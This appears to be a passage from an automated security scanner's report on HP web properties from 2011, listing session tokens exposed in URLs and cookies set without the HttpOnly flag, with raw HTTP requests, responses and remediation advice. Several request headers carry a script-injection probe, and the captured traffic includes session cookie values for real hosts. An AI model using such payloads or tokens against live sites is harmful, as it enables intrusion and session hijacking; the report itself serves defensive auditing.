<a href="/discussions/forum/p/forumId/37187/Personal_computing.htm?messageBoardId=2338&campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="udrline">Personal computing</a>
...[SNIP]...
</span><a href="/discussions/messageBoard/p/messageBoardId/2338/All_Campuses.htm?campusId=700&hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="bold">See all topics</a>
...[SNIP]...
<img src="/resources/images/s.gif" border="0" width="5" height="1" alt=""/>
<a href="/courses/refer.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba&target=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jsp" class="bold">Email this site</a>
...[SNIP]...
<div id="rssLink"><a href="/rssfeed/index.jsp?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" class="udrlinebold">RSS feed</a>
...[SNIP]...
<div style="display:none">
   <img src="/is/b4a0598c18/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/5c1282e20f/p/productId/104693/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/b51b2888fe/p/productId/104694/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/c87c677db9/p/productId/104695/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/8ff1a817fe/p/productId/104833/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/ea95574468/p/productId/104834/eventType/PDV/puid/999999b/campusId/11200/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/5b44ba4bbe/p/productId/104919/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/d4d43abb27/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/2e165f9239/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/f573d11a0e/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/b0437330bf/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
   <img src="/is/d2ffce4aeb/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=c4887600cb3bd30c1b052a7e38ba" height="1" width="1" alt=""/>
</div>
...[SNIP]...

5.5. http://h30415.www3.hp.com/css.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30415.www3.hp.com
Path:	/css.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

http://h30415.www3.hp.com/css.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896

Request

GET /css.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Host: h30415.www3.hp.com
Proxy-Connection: keep-alive
Referer: http://h30415.www3.hp.com/index.jsp?78db3%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec7cb7310b63=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcompc_usen=cartExists=false; hp_cust_seg_sel=HHO; jumpstack=%5B%5B'ex_r329_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_accessories_ql'%2C'1309434425265'%5D%5D; EMID=; hpjidc=37; bn_u=6923614956829433945; s_vi=[CS]v1|2706312D0501146A-60000108C016BD51[CE]; bnTrail=%5B%22http%3A%2F%2Fwww8.hp.com%2Fus%2Fen%2Fhome.html%3Fjumpid%3Dex_r163_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_promos_ql%22%5D; lang=en-us; cc=us; ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:03 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/css; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 343

#ifr_helper2 {width:1px;height:1px;}
#ifr_reflect {width:1px;height:1px;}
#layer_helper {width:1px;height:1px;}
#rpt_helper {position:absolute;visibility:hidden;width:1px;height:1px;top:-1000px;lef
...[SNIP]...

5.6. http://h30415.www3.hp.com/domovoi.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30415.www3.hp.com
Path:	/domovoi.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

http://h30415.www3.hp.com/domovoi.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896&78db3

Request

GET /domovoi.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896&78db3 HTTP/1.1
Host: h30415.www3.hp.com
Proxy-Connection: keep-alive
Referer: http://h30415.www3.hp.com/index.jsp?78db3%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec7cb7310b63=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcompc_usen=cartExists=false; hp_cust_seg_sel=HHO; jumpstack=%5B%5B'ex_r329_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_accessories_ql'%2C'1309434425265'%5D%5D; EMID=; hpjidc=37; bn_u=6923614956829433945; s_vi=[CS]v1|2706312D0501146A-60000108C016BD51[CE]; bnTrail=%5B%22http%3A%2F%2Fwww8.hp.com%2Fus%2Fen%2Fhome.html%3Fjumpid%3Dex_r163_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_promos_ql%22%5D; lang=en-us; cc=us; ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:04 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/javascript; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 32334

var nsParam = '&nsid=a-4d123106:130e2c22257:1896';
var skinParam = '';
var dbgParam = '';
var player = "FLV";

//document.oncontextmenu = function() {return false;}

var imgsrc = "htt
...[SNIP]...

5.7. http://h30415.www3.hp.com/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30415.www3.hp.com
Path:	/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

http://h30415.www3.hp.com/css.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?nsid=a-4d123106:130e05eab40:-79a2
http://h30415.www3.hp.com/domovoi.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?nsid=a-4d123106:130e05eab40:-79a2
http://h30415.www3.hp.com/skins/hpgateway_skin.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?element=999&nsid=a-4d123106:130e05eab40:-79a2
http://h30415.www3.hp.com/skins/hpgateway_ui.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?element=999&nsid=a-4d123106:130e05eab40:-79a2

Request

GET /index.jsp HTTP/1.1
Host: h30415.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=XVIOVMS10.100.129.43CKMWY; path=/
Date: Thu, 30 Jun 2011 11:50:09 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Set-Cookie: fr_puid=063011_075009770_w4d123106x130e05eab40xw79a1; path=/; expires=Sat, 29-Jun-2013 11:50:09 GMT
Set-Cookie: frC=1
Set-Cookie: JSESSIONID=abcNv0IBrzMHBfh6NyGdt; path=/
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 4128
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="all_html" lang="en-US">
<head>

<script type="text/java
...[SNIP]...
<link REL="SHORTCUT ICON" HREF="/affiliate/hpgateway/favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="http://h30415.www3.hp.com/css.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?nsid=a-4d123106:130e05eab40:-79a2" type="text/css" />

<link rel="stylesheet" href="http://h30415.www3.hp.com/skins/hpgateway_ui.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?element=999&nsid=a-4d123106:130e05eab40:-79a2" type="text/css" />
<link rel="stylesheet" href="http://h30415.www3.hp.com/skins/hpgateway_skin.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?element=999&nsid=a-4d123106:130e05eab40:-79a2" type="text/css" />

<BASE HREF="http://hpgateway.i.feedroom.com/affiliate/" id="bs">
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://h30415.www3.hp.com/domovoi.jsp;jsessionid=abcNv0IBrzMHBfh6NyGdt?nsid=a-4d123106:130e05eab40:-79a2"></script>
...[SNIP]...

5.8. http://h30415.www3.hp.com/skins/hpgateway_skin.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30415.www3.hp.com
Path:	/skins/hpgateway_skin.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

http://h30415.www3.hp.com/skins/hpgateway_skin.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?element=999&nsid=a-4d123106:130e2c22257:1896

Request

GET /skins/hpgateway_skin.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?element=999&nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Host: h30415.www3.hp.com
Proxy-Connection: keep-alive
Referer: http://h30415.www3.hp.com/index.jsp?78db3%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec7cb7310b63=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcompc_usen=cartExists=false; hp_cust_seg_sel=HHO; jumpstack=%5B%5B'ex_r329_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_accessories_ql'%2C'1309434425265'%5D%5D; EMID=; hpjidc=37; bn_u=6923614956829433945; s_vi=[CS]v1|2706312D0501146A-60000108C016BD51[CE]; bnTrail=%5B%22http%3A%2F%2Fwww8.hp.com%2Fus%2Fen%2Fhome.html%3Fjumpid%3Dex_r163_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_promos_ql%22%5D; lang=en-us; cc=us; ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:03 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/css; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 1570

A, span, div, td {font-family:Arial,sans-serif;font-size:12px;color:#000000;}
body.actionbox {width:270px;background-image:none;background-color:#ffffff;overflow:auto;}
DIV.bodyTextWrapper{ posi
...[SNIP]...

5.9. http://h30415.www3.hp.com/skins/hpgateway_ui.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30415.www3.hp.com
Path:	/skins/hpgateway_ui.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

http://h30415.www3.hp.com/skins/hpgateway_ui.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?element=999&nsid=a-4d123106:130e2c22257:1896

Request

GET /skins/hpgateway_ui.jsp;jsessionid=abcXE0gs2UGqA6THBrJdt?element=999&nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Host: h30415.www3.hp.com
Proxy-Connection: keep-alive
Referer: http://h30415.www3.hp.com/index.jsp?78db3%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec7cb7310b63=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcompc_usen=cartExists=false; hp_cust_seg_sel=HHO; jumpstack=%5B%5B'ex_r329_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_accessories_ql'%2C'1309434425265'%5D%5D; EMID=; hpjidc=37; bn_u=6923614956829433945; s_vi=[CS]v1|2706312D0501146A-60000108C016BD51[CE]; bnTrail=%5B%22http%3A%2F%2Fwww8.hp.com%2Fus%2Fen%2Fhome.html%3Fjumpid%3Dex_r163_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_promos_ql%22%5D; lang=en-us; cc=us; ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:03 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/css; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 9026

DIV { vertical-align:middle; }
body.main {z-index:1;text-align:center;min-width:690px;height:690px;background-color:#ffffff;}
body.scaled {top:0px;left:0px;min-width:0;width:100%;height:100%;bac
...[SNIP]...

6. Cookie without HttpOnly flag set previous next
There are 76 instances of this issue:

http://h10088.www1.hp.com/cda/gap/display/main/index.jsp
http://h30187.www3.hp.com/
http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm
http://h30187.www3.hp.com/howto_QL_courses.jsp
http://h30187.www3.hp.com/index.jsp
https://h30248.www3.hp.com/recycle/supplies/index.asp
http://h30415.www3.hp.com/index.jsp
http://h30428.www3.hp.com/
http://hp.digitalriver.com/store/hpappli/DisplayHomePage/
https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx
https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php
http://h30415.www3.hp.com/affiliate/hpgateway/favicon.ico
http://h30417.www3.hp.com/p/subscribe
http://h30499.www3.hp.com/t5/Community-Feedback-&-Suggestions/bd-p/community-feedback-suggestions
http://h30499.www3.hp.com/t5/Fortify-Software-Security-Center-Discussion/bd-p/sws-Fortifyforum
http://h30499.www3.hp.com/t5/ITRC-Business-Availability-Center-Forum/bd-p/itrc-875
http://h30507.www3.hp.com/
https://hp.digitalriver.com/store
http://www.shopping.hp.com/accessories-store/computer
http://www.shopping.hp.com/accessories-store/handheld
http://www.shopping.hp.com/accessories-store/printer
http://www.shopping.hp.com/accessories-store/scanner
http://www.shopping.hp.com/accessories-store/touchpad
http://www.shopping.hp.com/can/computer/categories/ac_adapters/1/accessories
http://www.shopping.hp.com/can/computer/categories/ac_adapters/2/accessories
http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories
http://www.shopping.hp.com/can/computer/categories/carrying_cases/2/accessories
http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories
http://www.shopping.hp.com/can/computer/categories/digital_cameras/2/accessories
http://www.shopping.hp.com/can/computer/categories/docking_solutions/1/accessories
http://www.shopping.hp.com/can/computer/categories/docking_solutions/2/accessories
http://www.shopping.hp.com/can/computer/categories/home_theater_audio/1/accessories
http://www.shopping.hp.com/can/computer/categories/home_theater_audio/2/accessories
http://www.shopping.hp.com/can/computer/categories/memory/1/accessories
http://www.shopping.hp.com/can/computer/categories/memory/2/accessories
http://www.shopping.hp.com/can/computer/categories/mice_keyboards/1/accessories
http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories
http://www.shopping.hp.com/can/computer/categories/music_devices/1/accessories
http://www.shopping.hp.com/can/computer/categories/music_devices/2/accessories
http://www.shopping.hp.com/can/computer/categories/networking/1/accessories
http://www.shopping.hp.com/can/computer/categories/networking/2/accessories
http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories
http://www.shopping.hp.com/can/computer/categories/notebook_batteries/2/accessories
http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories
http://www.shopping.hp.com/can/computer/categories/photo_frames/2/accessories
http://www.shopping.hp.com/can/computer/categories/projector_accessories/1/accessories
http://www.shopping.hp.com/can/computer/categories/projector_accessories/2/accessories
http://www.shopping.hp.com/can/computer/categories/security_systems/2/accessories
http://www.shopping.hp.com/can/computer/categories/software/1/accessories
http://www.shopping.hp.com/can/computer/categories/software/2/accessories
http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories
http://www.shopping.hp.com/can/computer/categories/speakers_headsets/2/accessories
http://www.shopping.hp.com/can/computer/categories/storage_solutions/1/accessories
http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories
http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories
http://www.shopping.hp.com/can/computer/categories/tvs/2/accessories
http://www.shopping.hp.com/webapp/shopping/accessories_landing.do
http://www.shopping.hp.com/webapp/shopping/can.do
http://www.shopping.hp.com/webapp/shopping/catalogRequest.do
http://www.shopping.hp.com/webapp/shopping/cto.do
http://www.shopping.hp.com/webapp/shopping/express_store.do
http://www.shopping.hp.com/webapp/shopping/feedback.do
http://www.shopping.hp.com/webapp/shopping/help.do
http://www.shopping.hp.com/webapp/shopping/home.do
http://www.shopping.hp.com/webapp/shopping/mpss_portal.do
http://www.shopping.hp.com/webapp/shopping/offers_guide.do
http://www.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do
http://www.shopping.hp.com/webapp/shopping/questions.do
http://www.shopping.hp.com/webapp/shopping/return_exchange.do
http://www.shopping.hp.com/webapp/shopping/sale_guide.do
http://www.shopping.hp.com/webapp/shopping/search_request.do
http://www.shopping.hp.com/webapp/shopping/series_can.do
http://www.shopping.hp.com/webapp/shopping/store_access.do
http://www.shopping.hp.com/webapp/shopping/supplies_category.do
http://www.shopping.hp.com/webapp/shopping/terms.do
http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h10088.www1.hp.com
Path:	/cda/gap/display/main/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=3D533374E9061B549D5A03490E046319.g2u0831c_16; Path=/cda

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cda/gap/display/main/index.jsp HTTP/1.1
Host: h10088.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Cache-Control: max-age=0
Content-Length: 563
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 30 Jun 2011 11:52:04 GMT
Connection: close
Set-Cookie: JSESSIONID=3D533374E9061B549D5A03490E046319.g2u0831c_16; Path=/cda

<html>
<head>
   <title>Error</title>
   <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
   <META NAME="generator" content="sezame">
   <META NAME="robots" CONTENT="index,follow">
...[SNIP]...

6.2. http://h30187.www3.hp.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:06 GMT
hplcpsession.id=ccffa6efd534215680f21de99d92; path=/
JSESSIONID=abcArzKl3wxVy4fELyGdt; path=/
AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.3. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:11 GMT
hplcpsession.id=ddde6b1e223a54f104d30891553f; path=/
JSESSIONID=abc90wSffaQ6U6JTMyGdt; path=/
AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851;PATH=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.4. http://h30187.www3.hp.com/howto_QL_courses.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/howto_QL_courses.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:11 GMT
hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a; path=/
JSESSIONID=abcECuaO8KCmEcQPMyGdt; path=/
AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.5. http://h30187.www3.hp.com/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:06 GMT
hplcpsession.id=c4887600cb3bd30c1b052a7e38ba; path=/
JSESSIONID=abcfp9AGUFyAb67LLyGdt; path=/
AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.jsp HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.6. https://h30248.www3.hp.com/recycle/supplies/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://h30248.www3.hp.com
Path:	/recycle/supplies/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQAVDCCAQ=DFCFDEDAIALOBFJEPPKHDOCF; secure; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recycle/supplies/index.asp HTTP/1.1
Host: h30248.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 30 Jun 2011 11:50:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 26506
Content-Type: text/html
Expires: Wed, 29 Jun 2011 11:50:06 GMT
Set-Cookie: ASPSESSIONIDQAVDCCAQ=DFCFDEDAIALOBFJEPPKHDOCF; secure; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>


   <title>HP supplies recycling program</title>

   <meta http-
...[SNIP]...

6.7. http://h30415.www3.hp.com/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h30415.www3.hp.com
Path:	/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=abcNv0IBrzMHBfh6NyGdt; path=/
ARPT=XVIOVMS10.100.129.43CKMWY; path=/
fr_puid=063011_075009770_w4d123106x130e05eab40xw79a1; path=/; expires=Sat, 29-Jun-2013 11:50:09 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.jsp HTTP/1.1
Host: h30415.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.8. http://h30428.www3.hp.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://h30428.www3.hp.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=abcZVrcEuFDQR99bOyGdt; path=/
ARPT=XVIOVMS10.100.129.43CKMWY; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: h30428.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Set-Cookie: ARPT=XVIOVMS10.100.129.43CKMWY; path=/
Date: Thu, 30 Jun 2011 11:50:10 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Location: http://hpproserv.feedroom.com
Content-Length: 67
Set-Cookie: JSESSIONID=abcZVrcEuFDQR99bOyGdt; path=/
Content-Type: text/html; charset=iso-8859-1
